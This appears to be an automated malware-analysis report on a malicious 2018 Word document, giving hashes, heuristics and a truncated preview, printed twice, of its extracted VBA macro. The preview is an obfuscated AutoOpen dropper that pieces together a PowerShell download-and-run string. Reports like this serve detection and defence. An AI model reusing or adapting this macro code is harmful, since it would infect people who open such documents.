Office (OLE) malware analysis — malicious · b6600f389bf52796

MALICIOUS

Office (OLE)

140.0 KB Created: 2018-01-09 11:21:00 Authoring application: Microsoft Office Word First seen: 2018-01-23

MD5: e93617f1c88e3e1b7100ae2e521228fb SHA-1: be8d188bc6cd3254d35c08e73c9e07fb010315ca SHA-256: b6600f389bf52796db5fcba03ef991df5a395a1a70b0f4096445469f9553ecde

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains legacy WordBasic and VBA macros, with a critical heuristic firing for a Shell() call within the VBA code. The AutoOpen macro is present and configured to execute a shell command, indicating a downloader or dropper functionality. The ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' further supports its malicious nature as a phishing lure dropper.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44153 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	44153 bytes
SHA-256: `64a57d8892bd74886ac9c8517e08d83afecd47569eab0736ccbef13f183fb1d8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "vIVlGqb" Sub AutoOpen() On Error Resume Next GtiDDkRjh = (1869133 - CSng(4790317) - (9628869 * Log(9941026 - Chr(rYIizwB)) + cYzCIBP + CInt(MEZfhEGnRIF + mtOUPlj))) GpVoNbARG = (859619 - CSng(326934) - (5300140 * Log(3060013 - Chr(GwUZUVmRV)) + rqwSjKfmX + CInt(IlrPLDhnAi + jpmjwtvvP))) uoUEwWchi = (9219249 - CSng(4839129) - (2948375 * Log(775478 - Chr(IUFENQozRmBLBM)) + mQkrIaTRnTpb + CInt(FEJAcudLqphiau + hClVQuvfoY))) vUoCSlYpo = (8762512 - CSng(2387221) - (5564407 * Log(303599 - Chr(GjavaCMhfwjk)) + UKEKYUbjaoIY + CInt(JplBLEA + OhUzFmL))) Application.Run "uoQjdwcFpqb", LaoHjkHh NosShDEfk = (6818902 - CSng(7603219) - (1600012 * Log(4923463 - Chr(juRXWsX)) + ikfkiFckKTiQTl + CInt(pqAFJBRXwbBhnC + itoRKHnzZwC))) zYTaJivwb = (6402046 - CSng(4203608) - (7537742 * Log(2594074 - Chr(MNiJcXphilobCa)) + CtbHHBtDWRTmo + CInt(uMGbVwuFnwa + SqilijUK))) ZoujFtTJM = (8439979 - CSng(1790761) - (7102925 * Log(274462 - Chr(oYiAjct)) + FijvjCVljnSiBG + CInt(aVcilsvnq + LBKChzrQ))) ciQzKKQob = (1625752 - CSng(4235692) - (3576166 * Log(4468474 - Chr(hFIfDwI)) + JrqkXBK + CInt(BnaNZXCaKSOw + nRXnGTEuC))) End Sub Function LaoHjkHh() On Error Resume Next wdlCwaDF = ("ije-host'+' Kk4_.EQXa+Q3aU+3aUXaxceQXa+QXaptQXa+QXa'+'ion.'+'Message;QXa+QXa}}QXa) -replaCE ([chaR]75+[chaR]10TpTzzcdDjNHj4moTIZ") zGANzfcjIqt = (3003951 - CSng(9176780) - (3760962 * Log(7477146 - Chr(wjXSEWf)) + KPwEtccHfEO + CInt(GcfAUTSilwFHrZ + YOpXRDXiDTw))) XpXPwIP = (7842243 - CSng(1376421) - (929314 * Log(6626563 - Chr(qFovWAXwlEzs)) + KoMUADtqh + CInt(ujzcjXiLdDMOCC + EYqqlMGiQsi))) oSNQwsuZ = Mid(wdlCwaDF, 3, 109) jwjYp = ("p3Ck2nwS4LEtt7CCjomuw9chaR]92-cREPL'+'aceQXaRZhQXa,[chaR]39) ) 3a'+'U)-rePlACe 3aUQXa3aU,[ChAR]'+'39)fdX. ( OFUeNV:pu'+'BliRJJsmo15QH") VHfQWaQPPD = (5787650 - CSng(2069800) - (4346911 * Log(7149826 - Chr(NYFHspomworbkr)) + BYQiEkQQBQSnI + CInt(jtFdXqVDK + KKdiivNdEBXFu))) GZRZCb = (8396455 - CSng(6347325) - (1963007 * Log(9486337 - Chr(DqZBfWQu)) + zNBWwNcUtHil + CInt(DoiHsazN + MtOzUNIiGRkIPQ))) pjHNoUQ = Mid(jwjYp, 23, 102) XvwWPFDkwU = ("torH4EPYE0qcr61it7+[chaR]52),[chaR]36-rep3aU+3aUlaCE QXaB4F'+'QXa,[fUrIzIF77pwsHCld") UjfBAoIEkI = (8069102 - CSng(1269077) - (5552239 * Log(5310918 - Chr(kNPvWawDMYCwT)) + zMnvJHOisqdPvK + CInt(VIXoNNbIkFtj + dkHfYEkQCLS))) tvKHwlpQZ = (3836786 - CSng(5083193) - (372779 * Log(4019724 - Chr(RHioRrQiKG)) + WDCpQYkEIjwr + CInt(aVSzEUmLGjTwP + MmUcVRTNMAVCvq))) iXCQz = Mid(XvwWPFDkwU, 18, 50) wRVqq = ("CaXa1, 3QXa+'+'QXa43245);K'+'k4huas QXa+Q3aU+3aUXa=QXa+QXa Kk4QXa+Q'+'Xa3aU+3aUenv:'+'pubQXa+QXalic + QXa+QXaRQXaH9DNpoPVJ8tds01vROi4WJnd0w2AS0Q") lEJXqjtT = (5728943 - CSng(351053) - (3718933 * Log(3606385 - Chr(YiqqPAnHrYQ)) + KXZjJZuGEm + CInt(wcdPPzw + FdjULIrLhdFKdP))) IUOVJ = (4947746 - CSng(6861970) - (4937483 * Log(3669863 - Chr(UcYMaliuOmkX)) + sYKubCOa + CInt(NNczcajCt + wRdXjRJihOdZw))) ROjlVktNz = Mid(wRVqq, 3, 111) kQcDqdkoPzd = ("PHGvM5B]97+[CHAR]85),[strINg][CHAR]39).RepLACe(([CHAR]79+[CHAR]70+[CHAR]85),[so8c0QKaLFoPLtJY6vdK3Ua2joE") YQajcOChiY = (1987775 - CSng(5009535) - (1809475 * Log(4223043 - Chr(iZdBRjBfIBEb)) + qDWvPZt + CInt(ZzhlpHbif + rHvjtDKWIQqsJ))) RWHcb = (3328698 - CSng(160206) - (3795506 * Log(8885031 - Chr(VOKkcTIbw)) + bYZwdMMTH + CInt(JSlsQdXh + QkVNMNQiHfcaR))) lKSAR = Mid(kQcDqdkoPzd, 8, 71) VSCINjawkzN = ("TME2ni4RqcJv5BZdJ1jZk+QXaZQXa+QXahB4FRQXa+QXaZh QXa+QXa+ KQXa+QXak4karapaQXa+QXas +'+' RZh.exQXa+QXaeRZh'+';foreach(Kk4QXa+QX'+'aabc inQXa+QXa Kk4bcd){t3aU+3aUry{KQXa+QXak4fra3aU+3aUnc.8IaCMNosktov8FUMwa") EAicZqG = (2637761 - CSng(7947588) - (4740899 * Log(5546920 - Chr(CPwthENr)) + UmMSIwUdwkGY + CInt(URHwiNjiII + SPbNJcWt))) MGnjVj = (3700739 - CSng(552208) - (8583108 * Log(334113 - Chr(NqhHksoWmi)) + hliWzIGMiCAtUG + CInt(UOMFVcPokr ... (truncated)

SHA-256: 64a57d8892bd74886ac9c8517e08d83afecd47569eab0736ccbef13f183fb1d8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "vIVlGqb"
Sub AutoOpen()
On Error Resume Next
GtiDDkRjh = (1869133 - CSng(4790317) - (9628869 * Log(9941026 - Chr(rYIizwB)) + cYzCIBP + CInt(MEZfhEGnRIF + mtOUPlj)))
GpVoNbARG = (859619 - CSng(326934) - (5300140 * Log(3060013 - Chr(GwUZUVmRV)) + rqwSjKfmX + CInt(IlrPLDhnAi + jpmjwtvvP)))
uoUEwWchi = (9219249 - CSng(4839129) - (2948375 * Log(775478 - Chr(IUFENQozRmBLBM)) + mQkrIaTRnTpb + CInt(FEJAcudLqphiau + hClVQuvfoY)))
vUoCSlYpo = (8762512 - CSng(2387221) - (5564407 * Log(303599 - Chr(GjavaCMhfwjk)) + UKEKYUbjaoIY + CInt(JplBLEA + OhUzFmL)))
Application.Run "uoQjdwcFpqb", LaoHjkHh
NosShDEfk = (6818902 - CSng(7603219) - (1600012 * Log(4923463 - Chr(juRXWsX)) + ikfkiFckKTiQTl + CInt(pqAFJBRXwbBhnC + itoRKHnzZwC)))
zYTaJivwb = (6402046 - CSng(4203608) - (7537742 * Log(2594074 - Chr(MNiJcXphilobCa)) + CtbHHBtDWRTmo + CInt(uMGbVwuFnwa + SqilijUK)))
ZoujFtTJM = (8439979 - CSng(1790761) - (7102925 * Log(274462 - Chr(oYiAjct)) + FijvjCVljnSiBG + CInt(aVcilsvnq + LBKChzrQ)))
ciQzKKQob = (1625752 - CSng(4235692) - (3576166 * Log(4468474 - Chr(hFIfDwI)) + JrqkXBK + CInt(BnaNZXCaKSOw + nRXnGTEuC)))
End Sub
Function LaoHjkHh()
On Error Resume Next
wdlCwaDF = ("ije-host'+' Kk4_.EQXa+Q3aU+3aUXaxceQXa+QXaptQXa+QXa'+'ion.'+'Message;QXa+QXa}}QXa)  -replaCE ([chaR]75+[chaR]10TpTzzcdDjNHj4moTIZ")
zGANzfcjIqt = (3003951 - CSng(9176780) - (3760962 * Log(7477146 - Chr(wjXSEWf)) + KPwEtccHfEO + CInt(GcfAUTSilwFHrZ + YOpXRDXiDTw)))
XpXPwIP = (7842243 - CSng(1376421) - (929314 * Log(6626563 - Chr(qFovWAXwlEzs)) + KoMUADtqh + CInt(ujzcjXiLdDMOCC + EYqqlMGiQsi)))
oSNQwsuZ = Mid(wdlCwaDF, 3, 109)
jwjYp = ("p3Ck2nwS4LEtt7CCjomuw9chaR]92-cREPL'+'aceQXaRZhQXa,[chaR]39) ) 3a'+'U)-rePlACe  3aUQXa3aU,[ChAR]'+'39)fdX. ( OFUeNV:pu'+'BliRJJsmo15QH")
VHfQWaQPPD = (5787650 - CSng(2069800) - (4346911 * Log(7149826 - Chr(NYFHspomworbkr)) + BYQiEkQQBQSnI + CInt(jtFdXqVDK + KKdiivNdEBXFu)))
GZRZCb = (8396455 - CSng(6347325) - (1963007 * Log(9486337 - Chr(DqZBfWQu)) + zNBWwNcUtHil + CInt(DoiHsazN + MtOzUNIiGRkIPQ)))
pjHNoUQ = Mid(jwjYp, 23, 102)
XvwWPFDkwU = ("torH4EPYE0qcr61it7+[chaR]52),[chaR]36-rep3aU+3aUlaCE QXaB4F'+'QXa,[fUrIzIF77pwsHCld")
UjfBAoIEkI = (8069102 - CSng(1269077) - (5552239 * Log(5310918 - Chr(kNPvWawDMYCwT)) + zMnvJHOisqdPvK + CInt(VIXoNNbIkFtj + dkHfYEkQCLS)))
tvKHwlpQZ = (3836786 - CSng(5083193) - (372779 * Log(4019724 - Chr(RHioRrQiKG)) + WDCpQYkEIjwr + CInt(aVSzEUmLGjTwP + MmUcVRTNMAVCvq)))
iXCQz = Mid(XvwWPFDkwU, 18, 50)
wRVqq = ("CaXa1, 3QXa+'+'QXa43245);K'+'k4huas QXa+Q3aU+3aUXa=QXa+QXa Kk4QXa+Q'+'Xa3aU+3aUenv:'+'pubQXa+QXalic + QXa+QXaRQXaH9DNpoPVJ8tds01vROi4WJnd0w2AS0Q")
lEJXqjtT = (5728943 - CSng(351053) - (3718933 * Log(3606385 - Chr(YiqqPAnHrYQ)) + KXZjJZuGEm + CInt(wcdPPzw + FdjULIrLhdFKdP)))
IUOVJ = (4947746 - CSng(6861970) - (4937483 * Log(3669863 - Chr(UcYMaliuOmkX)) + sYKubCOa + CInt(NNczcajCt + wRdXjRJihOdZw)))
ROjlVktNz = Mid(wRVqq, 3, 111)
kQcDqdkoPzd = ("PHGvM5B]97+[CHAR]85),[strINg][CHAR]39).RepLACe(([CHAR]79+[CHAR]70+[CHAR]85),[so8c0QKaLFoPLtJY6vdK3Ua2joE")
YQajcOChiY = (1987775 - CSng(5009535) - (1809475 * Log(4223043 - Chr(iZdBRjBfIBEb)) + qDWvPZt + CInt(ZzhlpHbif + rHvjtDKWIQqsJ)))
RWHcb = (3328698 - CSng(160206) - (3795506 * Log(8885031 - Chr(VOKkcTIbw)) + bYZwdMMTH + CInt(JSlsQdXh + QkVNMNQiHfcaR)))
lKSAR = Mid(kQcDqdkoPzd, 8, 71)
VSCINjawkzN = ("TME2ni4RqcJv5BZdJ1jZk+QXaZQXa+QXahB4FRQXa+QXaZh QXa+QXa+ KQXa+QXak4karapaQXa+QXas +'+' RZh.exQXa+QXaeRZh'+';foreach(Kk4QXa+QX'+'aabc inQXa+QXa Kk4bcd){t3aU+3aUry{KQXa+QXak4fra3aU+3aUnc.8IaCMNosktov8FUMwa")
EAicZqG = (2637761 - CSng(7947588) - (4740899 * Log(5546920 - Chr(CPwthENr)) + UmMSIwUdwkGY + CInt(URHwiNjiII + SPbNJcWt)))
MGnjVj = (3700739 - CSng(552208) - (8583108 * Log(334113 - Chr(NqhHksoWmi)) + hliWzIGMiCAtUG + CInt(UOMFVcPokr
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.